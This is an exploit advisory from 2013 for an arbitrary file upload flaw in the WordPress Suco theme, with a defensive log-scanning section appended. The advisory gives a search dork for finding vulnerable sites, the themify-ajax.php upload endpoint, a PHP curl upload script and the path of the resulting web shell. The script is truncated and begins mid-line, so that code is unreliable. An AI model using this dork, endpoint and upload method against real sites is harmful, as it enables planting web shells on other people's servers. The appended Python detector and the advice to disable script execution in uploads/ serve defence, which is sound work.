#Title : WordPress Suco Themes Arbitrary File Upload
#Author : DevilScreaM
#Date : 11/20/2013 - 20 November 2013
#Category : Web Applications
#Type : PHP
#Vendor : http://themify.me/
#Link : http://themify.me/themes/suco
#Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security
Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber
#Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |
#Tested : Mozilla, Chrome, Opera -> Windows & Linux
#Vulnerability : Arbitrary File Upload
#Dork :
inurl:wp-content/themes/suco
Arbitrary File Upload
Exploit : http://SITE-TARGET/wp-content/themes/suco/themify/themify-ajax.php
Script :
"@$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Shell Access :
http://SITE-TARGET/wp-content/themes/suco/uploads/devilscream.php
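Detection : an added example, not part of the original advisory. It scans web server access logs for the two request patterns listed above: a POST to the theme's themify/themify-ajax.php, and a request for a script file under the theme's uploads/ directory. The combined log format, the name scan(), the extension list and the sample lines are assumptions made for this example.

```python
import re
from urllib.parse import unquote

# Combined/common access-log format (assumed); other formats need another pattern.
LOG_LINE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3}) ')
# Script extensions to flag under uploads/ (an assumed list, extend as needed).
SCRIPT_EXT = re.compile(r"\.(?:php\d?|phtml|phar)(?:/|$)")

def scan(lines, theme="suco"):
    """Flag POSTs to the theme's themify-ajax.php and script requests under uploads/."""
    base = f"/wp-content/themes/{theme.lower()}/"
    posted, findings = set(), []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        # Normalise before matching: drop the query string, decode %xx,
        # fold case and collapse repeated slashes.
        raw = m["target"].split("?", 1)[0]
        path = re.sub(r"/{2,}", "/", unquote(raw).lower())
        if base not in path:
            continue
        rel = path.split(base, 1)[1]
        hit = {"ip": m["ip"], "time": m["ts"], "path": path, "status": int(m["status"])}
        if m["method"] == "POST" and rel == "themify/themify-ajax.php":
            posted.add(m["ip"])
            findings.append({**hit, "kind": "upload_post"})
        elif rel.startswith("uploads/") and SCRIPT_EXT.search(rel):
            # Status 200 means a script in the upload directory was actually served.
            findings.append({**hit, "kind": "script_request",
                             "served": m["status"] == "200",
                             "same_client_posted": m["ip"] in posted})
    return findings

# Constructed sample lines (documentation IP ranges, made-up file names).
SAMPLE_LOG = [
    '203.0.113.7 - - [20/Nov/2013:10:00:01 +0000] "POST /wp-content/themes/suco/themify/themify-ajax.php HTTP/1.1" 200 31 "-" "curl/7.30"',
    '203.0.113.7 - - [20/Nov/2013:10:00:05 +0000] "GET /wp-content/themes/suco/uploads/example.php?x=1 HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [20/Nov/2013:10:02:00 +0000] "GET /wp-content/themes/suco/uploads/logo.png HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [20/Nov/2013:10:03:00 +0000] "GET /wp-content/themes/suco/uploads/%65xample.PHP HTTP/1.1" 404 0 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for finding in scan(SAMPLE_LOG):
        print(finding)
```

A script_request with served set to True is the stronger signal; disabling script execution for the theme's uploads/ directory in the web server configuration stops an uploaded file from running.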